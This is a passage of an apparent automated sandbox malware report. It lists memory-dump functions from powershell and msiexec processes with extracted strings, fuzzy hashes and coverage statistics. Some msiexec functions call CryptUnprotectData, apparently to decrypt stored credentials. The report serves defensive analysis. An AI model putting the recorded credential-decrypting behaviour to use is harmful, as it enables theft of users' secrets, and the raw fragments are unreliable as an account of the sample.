tP^q, xrefs: 0781821C
tP^q, xrefs: 07818228
$^q, xrefs: 0781818C
$^q, xrefs: 078182DF
$^q, xrefs: 07818316
zl, xrefs: 0781835B
$^q, xrefs: 0781830A

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$zl$zl
API String ID: 0-1569718814
Opcode ID: fb8b5d47f72d7e65c159710efc0fb42d53eb6df81bc6d2ac9440ffed9ebab2a0
Instruction ID: 386911d99b2abd869754d39fd04f75abad304a617ebc0e9105307f6d8ee439e7
Opcode Fuzzy Hash: fb8b5d47f72d7e65c159710efc0fb42d53eb6df81bc6d2ac9440ffed9ebab2a0
Instruction Fuzzy Hash: 7C5193B17043069FDB354E69D806B66BBAAAFE1330F28C46BE449CF251CB31C845C351

Function 0781F94C Relevance: 8.9, Strings: 7, Instructions: 167COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0781FBBE
TQcq, xrefs: 0781F9BA
$^q, xrefs: 0781F9DB
tP^q, xrefs: 0781FACE
TQcq, xrefs: 0781FB62
$^q, xrefs: 0781F9FC
$^q, xrefs: 0781FB8C

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$TQcq$TQcq$tP^q$$^q$$^q$$^q
API String ID: 0-2461640029
Opcode ID: 892a0804a5d3edba0e0718aba358869c052993b2df021a72cf65845a20d6d759
Instruction ID: caadb29611a3ca2791ef33c7884e178e46ad819a82b11957a03b1446799105ee
Opcode Fuzzy Hash: 892a0804a5d3edba0e0718aba358869c052993b2df021a72cf65845a20d6d759
Instruction Fuzzy Hash: 905118F060220ADFDB24CE15C504BA677EAFFA5719F18886AEA05DF290C735DC85CB91

Function 0781E92D Relevance: 7.9, Strings: 6, Instructions: 414COMMON

Download Yara Rule

Strings

-uk, xrefs: 0781CC37
tLvk, xrefs: 0781C6E9
x.uk, xrefs: 0781CBE9
tLvk, xrefs: 0781C5F3
4'^q, xrefs: 0781C912
4'^q, xrefs: 0781C9B6

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tLvk$tLvk$x.uk$-uk
API String ID: 0-2660634735
Opcode ID: 4ec06f132ed1c60b065829fda19c8c518edd7a4a3922cb3f43a92c17f2d8a416
Instruction ID: 51e12f6523518e1c2c8164fbf792327a986d20dd23f517961b84b60898c9aa68
Opcode Fuzzy Hash: 4ec06f132ed1c60b065829fda19c8c518edd7a4a3922cb3f43a92c17f2d8a416
Instruction Fuzzy Hash: FD123FB0A40218DFDB24DF24C954FDABBB2BF85304F508499D909AB795CB32AD85CF91

Function 0781EA70 Relevance: 7.7, Strings: 6, Instructions: 211COMMON

Download Yara Rule

Strings

$^q, xrefs: 0781EC86
4'^q, xrefs: 0781EB8F
4'^q, xrefs: 0781EB9B
$^q, xrefs: 0781EB61
$^q, xrefs: 0781EB71
$^q, xrefs: 0781EB16

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
API String ID: 0-3669853574
Opcode ID: dfefe1a9b7dda3081099511acc4ebce8ea094b802cb37e862dd6d64e9ff7c5da
Instruction ID: 42897abf3d3da3f175a976caa27177fad296490c3a40ccae87972acfcbda71f7
Opcode Fuzzy Hash: dfefe1a9b7dda3081099511acc4ebce8ea094b802cb37e862dd6d64e9ff7c5da
Instruction Fuzzy Hash: 11612AB1B0420DDFCB24CE29D80466ABBE9AFD1222F14C57ADC56CF251DB31D885C791

Function 090F0AED Relevance: 7.7, Strings: 6, Instructions: 194COMMON

Download Yara Rule

Strings

XRcq, xrefs: 090F0C6D
XRcq, xrefs: 090F0C5D
$^q, xrefs: 090F0B45
XRcq, xrefs: 090F0B29
tP^q, xrefs: 090F0BD8
tP^q, xrefs: 090F0BCC

Memory Dump Source

Source File: 00000001.00000002.2435287321.00000000090F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90f0000_powershell.jbxd

Similarity

API ID:
String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
API String ID: 0-1682816917
Opcode ID: 5c69a83b448525788f268fa0898ad8997b0a64738a137c1f3d02434b51d09a07
Instruction ID: 88e9c610ce4caee26c2f55832a9016c14c7e1a237ac79675f535e2213eeebb9f
Opcode Fuzzy Hash: 5c69a83b448525788f268fa0898ad8997b0a64738a137c1f3d02434b51d09a07
Instruction Fuzzy Hash: 3261F7317402099FCB249F68856066BBBF3AF88310F24CC69EA059F756CB31DE45CBA1

Function 0781B280 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$^q, xrefs: 0781B2D3
$^q, xrefs: 0781B317
$^q, xrefs: 0781B307
$^q, xrefs: 0781B2FB
$^q, xrefs: 0781B323
$^q, xrefs: 0781B2B7

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 26e1ded8383ced50469ebe8060d84542a9d193f74b4ecb148076a69632f8ebf5
Instruction ID: 4612a0f0fe67421700c8b3944624c7f91ed721efd2a656873e400b675c0d5e2c
Opcode Fuzzy Hash: 26e1ded8383ced50469ebe8060d84542a9d193f74b4ecb148076a69632f8ebf5
Instruction Fuzzy Hash: 4F3127F2B0434B8FDB390DA6985417ABFE9AFE2211B2448BFC445CB645CE32C85D8352

Function 07810538 Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

$^q, xrefs: 078105FD
4'^q, xrefs: 07810632
$^q, xrefs: 07810609
4'^q, xrefs: 07810626
$^q, xrefs: 078105C4

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: a5aceadec8e95270d14906742c09c0365c662ef281bdf0f46f13b6bc790132f3
Instruction ID: be9d77b972394de010e8182930c9d435763c37b10968818e717e7db968244a61
Opcode Fuzzy Hash: a5aceadec8e95270d14906742c09c0365c662ef281bdf0f46f13b6bc790132f3
Instruction Fuzzy Hash: C841E4F1B003099FDB245E649D207AA7BAAAFD1210F14846AD905DF351DF32C9C6C7A2

Function 0781F798 Relevance: 6.4, Strings: 5, Instructions: 122COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0781F871
$^q, xrefs: 0781F80B
$^q, xrefs: 0781F851
4'^q, xrefs: 0781F87D
$^q, xrefs: 0781F845

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: bb14cd604efe5f41bf5a2c123074a4ab056b6282a4b275c4767790145058be85
Instruction ID: 956beb47ab21b0fb2f41bda9c39995d2f0e68d9010c42b4ccb851bb215eb45a1
Opcode Fuzzy Hash: bb14cd604efe5f41bf5a2c123074a4ab056b6282a4b275c4767790145058be85
Instruction Fuzzy Hash: 3E413BB1B0520ECFCB245F699400ABAB7EDAFE5214F24843ADA15D7B05DF32C486C761

Function 0781AE70 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0781B01B
$^q, xrefs: 0781AFE6
$^q, xrefs: 0781AECD
$^q, xrefs: 0781AEE9
tP^q, xrefs: 0781AF6B

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: 6987859b28653df42d35c793803c06a1aa2d160c39aee8a2ba1fa9a711949ed5
Instruction ID: 56747fbfd24fcc8879db7c00fe5c933352eab31f513d2b4463d7aa2826e3c5c8
Opcode Fuzzy Hash: 6987859b28653df42d35c793803c06a1aa2d160c39aee8a2ba1fa9a711949ed5
Instruction Fuzzy Hash: A531E4F0A0120ADFDB288E05C544F65BBF9EF55714F14C166E825DF290C732D985CB52

Function 0781F55E Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

d%dq, xrefs: 0781F645
tP^q, xrefs: 0781F611
4'^q, xrefs: 0781F6AF
d%dq, xrefs: 0781F5D7
d%dq, xrefs: 0781F63B

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
API String ID: 0-3846404929
Opcode ID: 18b37cb38913cf9b1a09900094bb36a37e83ab3af9d97b9721565d5cbda3782c
Instruction ID: 1ffa4d947ff04594631755638fad293c03ef2755625f5d063c3265e6a87c43d8
Opcode Fuzzy Hash: 18b37cb38913cf9b1a09900094bb36a37e83ab3af9d97b9721565d5cbda3782c
Instruction Fuzzy Hash: 5531D6B0B012099FCB28DF54C554A5ABBEAFF98714F248559EA06EF360CB31DD41CB90

Function 090F1AB1 Relevance: 6.3, Strings: 5, Instructions: 81COMMON

Download Yara Rule

Strings

$^q, xrefs: 090F1B27
$^q, xrefs: 090F1AEC
$^q, xrefs: 090F1B08
tP^q, xrefs: 090F1B6C
$^q, xrefs: 090F1AD0

Memory Dump Source

Source File: 00000001.00000002.2435287321.00000000090F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90f0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: f83034602dd4a775156afb9419e8c05611ad0fcea12fd70c1fe262086475329d
Instruction ID: 0bf949e18af5930d5effbfb821faf782f8a6e266e7b0385b332adff5cd7d1b18
Opcode Fuzzy Hash: f83034602dd4a775156afb9419e8c05611ad0fcea12fd70c1fe262086475329d
Instruction Fuzzy Hash: DF214836A04214DFCBA48E64C964A6A77F6EF40B60F14486AFE009F711EB31DA44C7A1

Function 090F460A Relevance: 5.3, Strings: 4, Instructions: 324COMMON

Download Yara Rule

Strings

tP^q, xrefs: 090F4868
tP^q, xrefs: 090F4747
tP^q, xrefs: 090F4753
tP^q, xrefs: 090F4874

Memory Dump Source

Source File: 00000001.00000002.2435287321.00000000090F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90f0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$tP^q$tP^q
API String ID: 0-91886675
Opcode ID: 64c0f42f95ea938e5f74b1d07c60d6505f7d08988ee7a4cbeb7c5a1f96c9afe7
Instruction ID: d8c6d84217d93c43a1f200bf415e448a7673a3c56a33ea729196d2e78f2cbc8e
Opcode Fuzzy Hash: 64c0f42f95ea938e5f74b1d07c60d6505f7d08988ee7a4cbeb7c5a1f96c9afe7
Instruction Fuzzy Hash: DCC18035B002089FCB149F58C568A6BBBE6BB88750F248C59FE059B760DB31DE46CBD1

Function 090F21D8 Relevance: 5.3, Strings: 4, Instructions: 259COMMON

Download Yara Rule

Strings

tP^q, xrefs: 090F23C4
tP^q, xrefs: 090F23B8
tP^q, xrefs: 090F22B3
tP^q, xrefs: 090F22A7

Memory Dump Source

Source File: 00000001.00000002.2435287321.00000000090F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90f0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$tP^q$tP^q
API String ID: 0-91886675
Opcode ID: 061868553d7d29ec1dbdb4dcd350dad9194e393e16317bc8c5505865a95c4f68
Instruction ID: 2989bf75eeb78a443d3af1241061518002afedf3b1e999afaf84a153157cda78
Opcode Fuzzy Hash: 061868553d7d29ec1dbdb4dcd350dad9194e393e16317bc8c5505865a95c4f68
Instruction Fuzzy Hash: ED91E431B002049FCB549F6CC924A6ABBE6FFC8310F248C59EA169F794DA31DD46CB91

Function 0781A020 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 0781A088
$^q, xrefs: 0781A04E
$^q, xrefs: 0781A032
$^q, xrefs: 0781A07C

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: ff3cce3906ad0f9541d8f6cd2a879607cd698514e7c8d0db79f5c6fa1cc34962
Instruction ID: 21c5d570a9230aa05285c53ea08c444e83b55e05a2a6aaf3a041f76deb677a05
Opcode Fuzzy Hash: ff3cce3906ad0f9541d8f6cd2a879607cd698514e7c8d0db79f5c6fa1cc34962
Instruction Fuzzy Hash: 922107B170120A9BDB3C4D79DD04B27ABDE9BE1714F24C82AA50ADB385DD36D8498362

Function 07810308 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

$^q, xrefs: 0781035E
4'^q, xrefs: 0781037F
$^q, xrefs: 07810352
4'^q, xrefs: 07810373

Memory Dump Source

Source File: 00000001.00000002.2431073884.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7810000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 79890255b4bcc3b17beb9587984d8f9921db5c5ac575e9cf9ce1294d38d429d0
Instruction ID: fd23aaed56bfd1c538a97dbdfe64129ae802c6d470a8c7c9099ea95715521377
Opcode Fuzzy Hash: 79890255b4bcc3b17beb9587984d8f9921db5c5ac575e9cf9ce1294d38d429d0
Instruction Fuzzy Hash: 73014962B0838A4FC32F1A2829202287FF65F93655B2945DBC041CF35BCE148C8EC397

Analysis Process: msiexec.exePID: 8056, Parent PID: 7424COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.9%
Total number of Nodes:	37
Total number of Limit Nodes:	3

Executed Functions

Function 02A8C468 Relevance: 6.5, Strings: 5, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 02A8C469
PH^q, xrefs: 02A8C3EF
PH^q, xrefs: 02A8C400
PH^q, xrefs: 02A8C6BF
PH^q, xrefs: 02A8C6D0

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: '$PH^q$PH^q$PH^q$PH^q
API String ID: 0-3049011299
Opcode ID: 1ddfa88de014e337994d22be400086f2ec49146059ff4dc5ffe9da761b1f9342
Instruction ID: e5873a5f46443398ed2f246797ee5fd9fa452fd0c8579957196c6b473bded2b6
Opcode Fuzzy Hash: 1ddfa88de014e337994d22be400086f2ec49146059ff4dc5ffe9da761b1f9342
Instruction Fuzzy Hash: 4CB1F474E00218CFDB18DFA9D984A9DFBF2FF89310F10906AE419AB265DB349946CF50

Function 02A829EC Relevance: 5.5, Strings: 4, Instructions: 499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 02A82AD8
Xbq, xrefs: 02A82A9E
Xbq, xrefs: 02A82BA4
Xbq, xrefs: 02A82B57

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: e777ed4777eaf97e93d014ba564e06bbdf401e5e6299b2172caa3452a6386fbf
Instruction ID: 9bee70fc96e8d9164cb411451deb173a5adc31604b2e13ef07411a6e0123bc2d
Opcode Fuzzy Hash: e777ed4777eaf97e93d014ba564e06bbdf401e5e6299b2172caa3452a6386fbf
Instruction Fuzzy Hash: 3AE124719093D54BCF229B78859A7EBBFB1AF96348F1844D9CCC26B21ADB244943CF41

Function 02A8C738 Relevance: 3.9, Strings: 3, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02A8C9A0
PH^q, xrefs: 02A8C98F
', xrefs: 02A8C739

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: '$PH^q$PH^q
API String ID: 0-1003960284
Opcode ID: 5d1665eb37654dc404db9a2865892d02c6bd2249ca68515e9bdcfc4a790504a3
Instruction ID: be16b9e35ea6a75d086c02eef8304450b7e21f2cc6525c862d44b41d5b57fb57
Opcode Fuzzy Hash: 5d1665eb37654dc404db9a2865892d02c6bd2249ca68515e9bdcfc4a790504a3
Instruction Fuzzy Hash: 6E819474E40218CFDB18DFAAD984A9DBBF2BF88310F14D06AE419AB365DB349945CF50

Function 02A83E09 Relevance: 2.8, Strings: 2, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 02A83E2E
Xbq, xrefs: 02A83E47

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: a2f49614d69e8f26738d25dd9cf6b9b6fd9e3c06226a8355249d2094ccc83d16
Instruction ID: 6d59cc5ee71c03b262dbb7e29c43624aea2939d3f91b4785993500aa0e966fe1
Opcode Fuzzy Hash: a2f49614d69e8f26738d25dd9cf6b9b6fd9e3c06226a8355249d2094ccc83d16
Instruction Fuzzy Hash: 2D91A371F08219DBDB18AB78845867F7BB7BFC8710B04892DD446E7288DF398C068796

Function 02A8C147 Relevance: 2.7, Strings: 2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02A8C3EF
PH^q, xrefs: 02A8C400

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 3b5fa6c6a2f9d075e17c612c6db8498b1719874f5efe23bf7940ece14858c03b
Instruction ID: 7ac516c28e025b9a2c8e7d50f914f628b1a5bb988d2e41c287b28516c34d38ed
Opcode Fuzzy Hash: 3b5fa6c6a2f9d075e17c612c6db8498b1719874f5efe23bf7940ece14858c03b
Instruction Fuzzy Hash: 00A1D575E00218CFDB18DFA9D984A9DFBF2FF89310F14806AE419AB265DB349946CF50

Function 02A85362 Relevance: 2.7, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02A855C8
PH^q, xrefs: 02A855D9

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 9c4b3085efcfbae3d2dd7151816e6202e2091811a530be4f6b1d85d51cc377d1
Instruction ID: 4154d7cb7a6f792a106e7657b503b019e0470fdcf215db464ffe42a39862f9a4
Opcode Fuzzy Hash: 9c4b3085efcfbae3d2dd7151816e6202e2091811a530be4f6b1d85d51cc377d1
Instruction Fuzzy Hash: 5391E874E00258CFDB18DFA9D884A9DBBF2BF89300F15806AE819AB365DB359945CF10

Function 02A8CA08 Relevance: 2.7, Strings: 2, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02A8CC70
PH^q, xrefs: 02A8CC5F

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: c430d772b0310c52c6edca90f8eb1d93ea621f3368f43adaa50861f122cfc1bd
Instruction ID: 3aa36f21a2840d884dbcfcb9e940e7bf96a010764d511d736286acfeabd7f516
Opcode Fuzzy Hash: c430d772b0310c52c6edca90f8eb1d93ea621f3368f43adaa50861f122cfc1bd
Instruction Fuzzy Hash: 9781A574E00618CFDB18DFAAD984A9DBBF2BF88310F14C06AE519AB365DB345985CF50

Function 02A8CCD8 Relevance: 2.7, Strings: 2, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02A8CF2F
PH^q, xrefs: 02A8CF40

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: eb0af0f193911124ea145f46c2de0c6d448ecfe3c853db135505871faef58827
Instruction ID: 5a6e04fcc7fd4586d720f1e0098afc4805a0674b1fdfb3b8d91bbbe176466562
Opcode Fuzzy Hash: eb0af0f193911124ea145f46c2de0c6d448ecfe3c853db135505871faef58827
Instruction Fuzzy Hash: A581A574E00218CFDB18DFA9D984A9DBBF2BF88310F14C06AE519AB365DB349985CF50

Function 02A8D278 Relevance: 2.7, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02A8D4E0
PH^q, xrefs: 02A8D4CF

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: a0d7c96401c16ac8ee51d52d152db77d18439c48ad773f5f704ae50598b7f8bf
Instruction ID: 1c360122cda7b8c6268a91bd5189da9d0bad7e8a4e9c1a99225a6cf2c0a7b671
Opcode Fuzzy Hash: a0d7c96401c16ac8ee51d52d152db77d18439c48ad773f5f704ae50598b7f8bf
Instruction Fuzzy Hash: 6C81A474E00618CFDB18DFAAD984A9DBBF2BF89300F14C069E419AB365DB349985CF50

Function 02A8CFA9 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02A8D210
PH^q, xrefs: 02A8D1FF

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 919f1483794c600482016c9097de652b270da9078776b6680e29b3454902fef2
Instruction ID: 29a536d282f7476b5cbcc0d27de09cdda9e6940793a654ce159f1f507e13ad34
Opcode Fuzzy Hash: 919f1483794c600482016c9097de652b270da9078776b6680e29b3454902fef2
Instruction Fuzzy Hash: 1E819274E00618CFDB14DFAAD984AADBBF2BF89310F149069E419AB365DB349985CF10

Function 27EF8EF1 Relevance: 1.6, APIs: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27EF8F5D

Memory Dump Source

Source File: 00000006.00000002.3027249528.0000000027EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 27EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27ef0000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: ad40bcf659ebd63dfaee9c422a95efddaa998c4da30710f5e4ff21785624b143
Instruction ID: fd3f0bbba7d02e2a174c6a8fa45ec0285abfcd08c41ce081fe172a0d1b631278
Opcode Fuzzy Hash: ad40bcf659ebd63dfaee9c422a95efddaa998c4da30710f5e4ff21785624b143
Instruction Fuzzy Hash: 67118B72800209DFDB11CF99C845BEEBFF5EF48320F24841AE968A7250C335A550DFA5

Function 27EF87A8 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27EF8F5D

Memory Dump Source

Source File: 00000006.00000002.3027249528.0000000027EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 27EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27ef0000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: a3a0847cf4ebea3795763ebf0644a238e97edfe91d10c77d5fce3fdfc3b52551
Instruction ID: 04059aa8f3156bb64ab66cb82bdb691d695ed4dc709f2651fdf9c4ad521f8677
Opcode Fuzzy Hash: a3a0847cf4ebea3795763ebf0644a238e97edfe91d10c77d5fce3fdfc3b52551
Instruction Fuzzy Hash: 0E112972800249DFDB10DF99C845BDEBFF5EB48320F20845AE568A7611C375A950DFA5

Function 27EF7B78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3027249528.0000000027EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 27EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27ef0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199c84b56b5f4fb0b9af334268a157266c61939f62dbedf2901de4a6d20c6a4a
Instruction ID: c50933c766413081b1ca1530a5e1b035286023508d7fc170878e827a0fdea105
Opcode Fuzzy Hash: 199c84b56b5f4fb0b9af334268a157266c61939f62dbedf2901de4a6d20c6a4a
Instruction Fuzzy Hash: F9E19E74E01218CFEB14DFA5C984B9DBBB2BF89304F2081AAD418B7395DB755A85CF21

Function 02A8F961 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3003018494.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2a80000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1997add802589aed770529b703990dab63ef6936a7d6d5b1d8b900be09c6060f
Instruction ID: c1f1d7e153194a0a960e40bca92df56e56ce23917708df27381c4797c43b10ce
Opcode Fuzzy Hash: 1997add802589aed770529b703990dab63ef6936a7d6d5b1d8b900be09c6060f
Instruction Fuzzy Hash: 00C1C074E00218CFDB14DFA5C984B9DBBB2BF89304F6081A9D809AB365DB359E85CF51

Function 27EF8FB0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3027249528.0000000027EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 27EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_27ef0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d0cd8f39867b21321e21d5de53a89b62d23d59428874bc92ec5954a7acfd48
Instruction ID: aaf57bf296427e31479fd305f63bdad9a3b2f49227fb270391287b32b3da0ea7
Opcode Fuzzy Hash: 33d0cd8f39867b21321e21d5de53a89b62d23d59428874bc92ec5954a7acfd48
